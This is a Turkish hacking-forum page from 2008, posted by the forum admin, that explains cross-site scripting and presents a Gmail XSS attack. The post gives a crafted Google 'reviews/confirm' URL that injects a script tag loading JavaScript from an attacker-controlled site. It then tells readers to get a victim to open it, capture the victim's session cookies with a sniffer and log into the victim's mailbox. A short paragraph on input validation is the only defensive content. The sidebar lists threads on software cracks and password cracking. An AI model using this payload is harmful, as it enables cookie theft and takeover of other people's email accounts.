BASKALE.NETGOO

BASKALE.NETGOO

BLUE-MOON-HACKERTEAM
 
AnasayfaAnasayfa  GaleriGaleri  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  Kayıt OlKayıt Ol  Giriş yapGiriş yap  
Arama
 
 

Sonuç :
 
Rechercher çıkıntı araştırma
En son konular
» Delphi Derleyicileri Başlığı
Paz Şub. 20, 2011 12:53 am tarafından byhuysuz

» Modemi hızlandırma
C.tesi Şub. 19, 2011 2:17 pm tarafından byhuysuz

» Visual Studio 2010 Yükle Sadece [10mb]
C.tesi Şub. 19, 2011 12:16 pm tarafından byhuysuz

» Adobe'nin Bütün Versiyonları İçin Crack
Salı Şub. 15, 2011 9:25 pm tarafından byhuysuz

» 1st javascript Editor Professional Edition v5.1 | 8.11 Mb
Salı Şub. 08, 2011 3:35 pm tarafından byhuysuz

» 30 Sn'de [Pc Çökertme + Panzehir]
Ptsi Şub. 07, 2011 4:13 pm tarafından byhuysuz

» Java Görsel Eğitim Seti
Ptsi Ağus. 09, 2010 9:32 pm tarafından admin

» Programlamaya Nereden Baslamali?
Ptsi Ağus. 09, 2010 9:30 pm tarafından admin

» C / C++ E-Book Paylaşımı
Ptsi Ağus. 09, 2010 9:29 pm tarafından admin

» C dilinde basit bir mayın tarlası programı
Ptsi Ağus. 09, 2010 9:05 pm tarafından admin

» Delphi 7 Katılımsız Full | 150mb |
Ptsi Ağus. 09, 2010 8:58 pm tarafından admin

» Delphi 1
Ptsi Ağus. 09, 2010 8:57 pm tarafından admin

» İnternetle İlgili Doğru Sanılan Efsaneler
Ptsi Ağus. 09, 2010 8:54 pm tarafından admin

» Tek Tip Şarj Cihazı Dönemi Başlıyor ..
Ptsi Ağus. 09, 2010 8:53 pm tarafından admin

» Türk mucitten 7 boyutlu sinema
Ptsi Ağus. 09, 2010 8:52 pm tarafından admin

» Schrödinger’in Kedisi | Hem Ölü Hem Canlı
Ptsi Ağus. 09, 2010 8:51 pm tarafından admin

» Win Vista Püf Noktaları ve Optimizasyon
Ptsi Ağus. 09, 2010 8:48 pm tarafından admin

» Bölüm İndex
Ptsi Ağus. 09, 2010 8:47 pm tarafından admin

» Win 7 Püf Noktaları ve Optimizasyon
Ptsi Ağus. 09, 2010 8:45 pm tarafından admin

» Win Xp Püf Noktaları ve Optimizasyon
Ptsi Ağus. 09, 2010 8:44 pm tarafından admin

» Yeni Güvenlik Uygulamalarımız (2010)
Ptsi Ağus. 09, 2010 8:43 pm tarafından admin

» Önemli Olan Güvenlik İse?
Ptsi Ağus. 09, 2010 8:42 pm tarafından admin

» Perl ve Python Exploit Bilgisi (Bug-Res)
Ptsi Ağus. 09, 2010 8:41 pm tarafından admin

» Sonu Olmayan Bir Hack Dökümanı Bug-Res
Ptsi Ağus. 09, 2010 8:40 pm tarafından admin

» Hacking Interface Kitabı - X-Master
Ptsi Ağus. 09, 2010 8:38 pm tarafından admin

» Bug Nedir? Nasıl Oluşur/Bulunur? Bug-Res
Ptsi Ağus. 09, 2010 8:37 pm tarafından admin

» Gerçek Pc Hızlandırma(Uçak Gibi)
Cuma Ağus. 06, 2010 8:46 pm tarafından admin

» 50 Adet Hack Videosu Türkçe [Videolar]
Cuma Ağus. 06, 2010 8:45 pm tarafından admin

» İndexinize Bilgisayarınızdan Arka Plan Müziği||Mr.SoLucaN
Cuma Ağus. 06, 2010 8:44 pm tarafından admin

» Hatırlamadığınız Şifreyi Kırın! 2010
Cuma Ağus. 06, 2010 8:41 pm tarafından admin

» Adsl Hack - Adsl Hackleme - Adls Hack 2010
Cuma Ağus. 06, 2010 8:01 pm tarafından admin

» 2009 Full Anti-Virus Programları
Cuma Ağus. 06, 2010 7:58 pm tarafından admin

Giriş yap
Kullanıcı Adı:
Şifre:
Beni hatırla: 
:: Şifremi unuttum

Paylaş | 
 

 Mail XSS & Cookie Bilgileri

Aşağa gitmek 
YazarMesaj
admin
spyajan
spyajan
avatar

Aktiflik :
0 / 9990 / 999

Mesaj Sayısı : 1028
Yaş : 28
Kayıt tarihi : 23/07/08

MesajKonu: Mail XSS & Cookie Bilgileri   Salı Tem. 29, 2008 5:48 pm

GMAİL XSS
S.A.

ilk önce XSS saldırısı nedir onu acıklayalım..

Cross Site Scripting olarak adlandırılır..

victim’in üye olduğu herhangi bir sitedeki hesabının, owner tarafından belirli kodlarla scriptlere gömülen saldırı türüdür.. Hackerın deneme-yanılma bir tür brutue attack yaparak bulmasıyla meydana gelir..

Hacker, başka bir scriptten, domainden veya hesaptan, XSS açığının bulunduğu siteye session bilgilerini ele geçirmesine ortam sağlar..

bu XSS (Cross Site Scripting) açığı daha çok Mail sistemlerinde karşımıza çıkar.. Bunun en büyük sebebi ise; XSS açığına günümüzdeki bir çok web uygulamalarında rastlanması ve ücretsiz güvenlik açığı tarama yazılımları ile kolayca bulunabilmesidir..


Bu bug’a en büyük çözüm ise; XSS (Cross Site Scripting) açığı bulunan scriptin yazılım kodlarının düzeltilmesidir.. Kullanılan scriptte, user’lardan alınan girdiler, mutlaka kontrol edilmelidir.. Bunun sayesinde web-mail güvenlik açıklarına sebebiyet veren; XSS (Cross Site Scripting) - SQL Injection - Buffer 0werflow gibi bug’lar rahatça fixlenebilecektir..

Örnek verecek olursak; hackerın XSS veya SQL Inj. için kullanacağımız kodlar arasında % > < ile başlayan karakterler bulunmaktadır.. Bu tür karakterlerin olduğu scriptlerde girilen verinin encode edilmesi gerekebilir.. Yani kısaca kullanılan "%" karakteri yerine v harfi uygulanırsa, böylece hacker başarısız olur..

Gelelim son olarak GOOGLE ürünü olan gmail.com servisinde XSS Açığına..

gmail.com hesabına sahip victim’i hacklemek için; kurbana vereceğim kodları yedirmeniz gerekmektedir.. Bu kodu victim’e yedirmek size kalmış tabii ki.. Herhangi bir siteye gömerekte yollayabilirsiniz, kullanılan scripte (ASP, PHP, vs) encode ederekte gömebilirsiniz veya sitenizde iframe olarak verebilirsiniz...

Kod;

http://www.google.com/reviews/w/confirm?url=http://volqan.us/root/index.php?"><SCRİPT>/XSS src= "http://sitendeki-JS-dosyanin adresi> <SCRİPT>&q=000&c=http://www.google.com/searchhl=en&q=000&btnG=Search&submit=VoLqaN">

(URL’leri kendi adresinize göre düzeltiniz)

Kurbana yedirdikten sonra gelen cerezleri, kendi cerezlerinizle editleyerek victim’in mailine giriş yapabilirsiniz..

Not: js dosya için, sniffer’ınızın olması gerekli

Kısa bir süre önce gmail hesabımı bu yolla kaptırmıstım : ) demek ki iş’e yarıyormus, neyse mühim olan "niçin hacklendim" değil "nasıl hacklendim"

GOOGLE’a ait gmail’deki bu açığın kapanması an meselesidir.. Hotmail gibi aylarca süren bir XSS açığı değil.. Bknz: En son bulunan Gmail XSS Açığı, 2 günde fixlenmişti..

Döküman tarafımca hazırlanmıştır
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://baskale.netgoo.org
 
Mail XSS & Cookie Bilgileri
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
BASKALE.NETGOO :: HAYCKER DÜNYASI (giriş) :: MSN Yahoo Google Talk IRC Skype-
Buraya geçin: